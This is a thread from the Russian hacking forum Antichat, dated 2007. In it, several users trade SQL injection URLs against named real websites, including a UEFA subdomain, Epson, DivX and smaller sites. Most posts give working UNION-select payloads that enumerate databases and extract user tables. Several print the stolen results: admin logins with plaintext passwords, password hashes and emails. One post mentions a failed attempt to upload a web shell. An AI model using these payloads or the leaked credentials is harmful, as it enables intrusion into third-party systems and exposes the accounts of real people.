ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2451  
Старый 09.06.2007, 12:35
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

...
Код:
http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,version(),3,user(),5,6,7,8,9,10,11,12,13,14,15,16,user()/*
http://www.respectcoalition.org/2006/news.php?ite=-1274+union+select+concat(user(),version()),2,3,4/*
 
Ответить с цитированием

  #2452  
Старый 09.06.2007, 22:01
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*
ооо
 
Ответить с цитированием

  #2453  
Старый 09.06.2007, 22:41
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

fr.freekick.uefa.com
Цитата:
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38/*&efMonth=0&efOrder=5'&efkeyword=
Цитата:
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,table_name,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+information_sc hema.tables/*&efMonth=0&efOrder=5'&efkeyword=
Цитата:
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,column_name,3,'d',5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38+from+information _schema.columns+where+table_name='tbadmin_users'/*&efMonth=0&efOrder=5'&efkeyword=
Цитата:
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,auUsername,3,'d',5,6,auPassword ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+tba dmin_users/*&efMonth=0&efOrder=5'&efkeyword=
логин:пароль
##gv:##mw
arena:rose67uf

Админка
http://fr.freekick.uefa.com/admin/

Шелл не смог залить. Есть скрипт аплода картинок, но там стоит проверка на расширение
 
Ответить с цитированием

  #2454  
Старый 09.06.2007, 23:28
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

eku.latin.epson.com
Цитата:
http://eku.latin.epson.com/V2/php/productos.php?idCategoria=-1+union+select+version()/*
Названия таблиц на испанском =)
 
Ответить с цитированием

  #2455  
Старый 09.06.2007, 23:50
Аватар для V.I.P
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

Сайт: www.cаpsi.ca
PHP код:
http://www.capsi.ca/council.php?mem_id=3+union+select+1,2,3,4,5,6,concat_ws(char(58),name,email,password),8,9,10,11,12,13+from+members/* 
Сайт: www.rаmzesexpo.com
PHP код:
http://www.ramzesexpo.com/ru/news/index.php?id=-24+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20+from+ramzesexpo/* 
Сайт: www.mеrrimack.tv
PHP код:
http://www.merrimack.tv/news/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/* 
Сайт: www.jеd-afrique.org
PHP код:
http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(58),login,password)+from+user/* 
Сайт: www.mоldavcable.com
PHP код:
http://www.moldavcable.com/newsread.php?id=-6+union+select+concat_ws(char(58),user,password)+from+mysql.user/* 
 
Ответить с цитированием

  #2456  
Старый 09.06.2007, 23:55
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

www.divx.com
Цитата:
http://www.divx.com/company/press/press_detail.php?pr_id=-4+union+select+1,convert(version()+using+latin1),3 ,4+from+users
Чё то стобцы не могу подобрать =\
 
Ответить с цитированием

  #2457  
Старый 10.06.2007, 00:46
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

www.edifier.ru

Код:
http://www.edifier.ru/news.php?&task=showfull&id=-80+union+select+1,2,3,4,version(),6,7/*
дальше туго
 
Ответить с цитированием

  #2458  
Старый 10.06.2007, 01:04
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

To Spyder
Для начала мона системного вытащить:
Код:
http://www.divx.com/company/press/press_detail.php?pr_id=-4+union+select+1,convert(user+using+latin1),3,4+from+mysql.user+limit+0,1/*
user: drupal
hash: 654065ad41dfec0d
 
Ответить с цитированием

  #2459  
Старый 10.06.2007, 01:46
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow

Цитата:
Цитата:http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*


ооо
http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,concat_ws(0x3a20,user_id,user_n ame,user_password,user_email,user_icq),4,5,6,7+fro m+users+limit+0,1/*

*E0AEE55D5A64DF698178C496D6BD03C2ED0336C0: kistion@cyberacing.ru: 89538062

Последний раз редактировалось Серенький; 10.06.2007 в 01:47.. Причина: sql
 
Ответить с цитированием

  #2460  
Старый 10.06.2007, 02:44
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

alextoun - в твое скули имееться таблица усер:
Код:
http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7+from+users/*
Цитата:
Сообщение от Ky3bMu4  
...
Код:
http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,version(),3,user(),5,6,7,8,9,10,11,12,13,14,15,16,user()/*
Ky3bMu4 аналогично имееться таблица усер:
cedric:cedalaloi
jim:jed&2006
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ